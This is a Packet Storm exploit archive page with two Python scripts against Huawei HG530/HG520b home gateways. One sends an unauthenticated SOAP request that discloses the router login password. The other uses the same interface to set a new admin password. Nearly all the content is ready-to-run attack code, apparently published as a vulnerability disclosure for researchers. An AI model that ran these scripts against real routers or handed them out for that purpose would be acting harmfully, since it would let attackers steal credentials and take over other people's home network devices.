what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Huawei Home Gateway HG530 / HG520b Password Disclosure / Change

Huawei Home Gateway HG530 / HG520b Password Disclosure / Change
Posted Jun 29, 2015
Authored by Fady Mohamed Osman

Two exploits for Huawei Home Gateway versions HG530 and HG520b that allow for password disclosure and password change.

tags | exploit
SHA-256 | 34153720563cde72b885eab1bf23d3c0496dfd344433d5815451d5624f2154ec

Huawei Home Gateway HG530 / HG520b Password Disclosure / Change

Change Mirror Download
---- Exploit 1 ----

getRouterPass_Huawei_HG530.py:

#! /usr/bin/python
import socket
import sys
import re

if len(sys.argv) !=2:
print "[*] Please enter the target ip."
print "[*] Usage : " + sys.argv[0] + " IP_ADDR"
exit()
# Create a TCP/IP socket
target_host = sys.argv[1]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect the socket to the port where the server is listening
server_address = (target_host, 80)
print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
sock.connect(server_address)
try:
soap = "<?xml version=\"1.0\"?>"
soap +="<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
soap +="<s:Body>"
soap +="<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
soap +="</m:GetLoginPassword>"
soap +="</s:Body>"
soap +="</s:Envelope>"
message = "POST /UD/?5 HTTP/1.1\r\n"
message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\"\r\n"
message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
message += "Host:" + target_host + "\r\n"
message += "Content-Length:" + str(len(soap)) +"\r\n"
message += "Expect: 100-continue\r\n"
message += "Connection: Keep-Alive\r\n\r\n"
sock.send(message)
data = sock.recv(1024)
print "[*] Recieved : " + data.strip()
sock.send(soap)
data = sock.recv(1024)
data += sock.recv(1024)
#print data
r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
m = r.search(data)
if m:
print "[*] Found the password: " + m.group(1)
finally:
sock.close()




---- Exploit 2 ----

setRouterPass_Huawei_HG530.py:

#! /usr/bin/python
import socket
import sys
import re

if len(sys.argv) !=3:
print "[*] Please enter the target ip and the new password."
print "[*] Usage : " + sys.argv[0] + " IP_ADDR NEW_PASS"
exit()

# Create a TCP/IP socket
target_host = sys.argv[1]
new_pass = sys.argv[2]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect the socket to the port where the server is listening
server_address = (target_host, 80)
print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
sock.connect(server_address)
try:
soap = "<?xml version=\"1.0\"?>"
soap +="<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
soap +="<s:Body>"
soap +="<m:SetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
soap +="<NewUserpassword>"+new_pass+"</NewUserpassword>"
soap +="</m:SetLoginPassword>"
soap +="</s:Body>"
soap +="</s:Envelope>"
message = "POST /UD/?5 HTTP/1.1\r\n"
message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#SetLoginPassword\"\r\n"
message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
message += "Host:" + target_host + "\r\n"
message += "Content-Length: " + str(len(soap)) + "\r\n"
message += "Expect: 100-continue\r\n"
message += "Connection: Keep-Alive\r\n\r\n"
sock.send(message)
data = sock.recv(1024)
print "[*] Recieved : " + data.strip()
sock.send(soap)
data = sock.recv(1024)
data += sock.recv(1024)
print "[*] Done."
finally:
sock.close()
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close